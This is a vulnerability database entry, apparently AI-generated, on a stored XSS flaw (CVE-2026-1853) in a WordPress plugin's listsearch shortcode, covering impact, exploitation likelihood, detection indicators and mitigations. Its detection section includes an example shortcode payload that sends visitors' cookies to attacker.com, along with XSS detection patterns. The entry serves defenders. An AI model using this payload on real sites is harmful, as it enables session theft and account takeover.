
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-1853 is a Stored Cross-Site Scripting (XSS) vulnerability in the BuddyHolis ListSearch plugin for WordPress. It affects all versions up to and including 1.1, stemming from insufficient input sanitization and output escaping on user-supplied attributes in the plugin's listsearch shortcode. Authenticated attackers with contributor-level access or above can inject arbitrary web scripts into pages that execute when any user visits the affected page. It carries a CVSS v3.1 base score of 6.4 (Medium) (Red Hat CVE, Wordfence).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The vulnerability exists because the plugin's listsearch shortcode fails to properly sanitize user-supplied attributes before rendering them in HTML output, allowing malicious script content to be stored in the database and later served to site visitors. Exploitation requires an authenticated session with at minimum contributor-level WordPress privileges, after which an attacker can embed a crafted shortcode containing a malicious JavaScript payload in a post or page (Red Hat CVE, Wordfence).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of users who visit the injected page, including administrators. This can lead to session cookie theft, credential harvesting, unauthorized administrative actions (such as creating rogue admin accounts), defacement, or redirection to malicious sites. The CVSS scope is rated as Changed, reflecting that the impact extends beyond the vulnerable component to affect other users' browser sessions (Red Hat CVE).
No public proof-of-concept exploit code or active in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.03%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for contributor-level authentication, limiting the attack surface compared to unauthenticated vulnerabilities (Red Hat CVE, Wordfence).
listsearch shortcode with a malicious JavaScript payload embedded in a vulnerable attribute, e.g., [listsearch attribute="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].wp-admin/post.php or the REST API containing listsearch shortcode content with encoded script tags or JavaScript event handlers.wp_posts table entries containing [listsearch shortcode with suspicious attribute values including <script>, javascript:, onerror=, onload=, or similar XSS payloads.listsearch shortcode, potentially carrying cookie or credential data in query parameters.WordPress site administrators should update the BuddyHolis ListSearch plugin to a version beyond 1.1 if a patched release is available, or deactivate and remove the plugin until a fix is confirmed. As a workaround, restrict contributor-level user registrations and limit who can publish or submit content containing shortcodes. Web application firewalls (WAFs) with XSS filtering rules can provide an additional layer of defense. Monitor the WordPress plugin repository for an updated release addressing this vulnerability (Red Hat CVE, Wordfence).
Wordfence included this vulnerability in their weekly WordPress vulnerability report for the period of February 9–15, 2026, as part of routine plugin security tracking (Wordfence). Spanish national cybersecurity agencies INCIBE-CERT and CCN-CERT also published early alerts for this CVE (INCIBE-CERT). No significant broader media coverage or notable researcher commentary beyond standard vulnerability disclosure channels has been observed.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."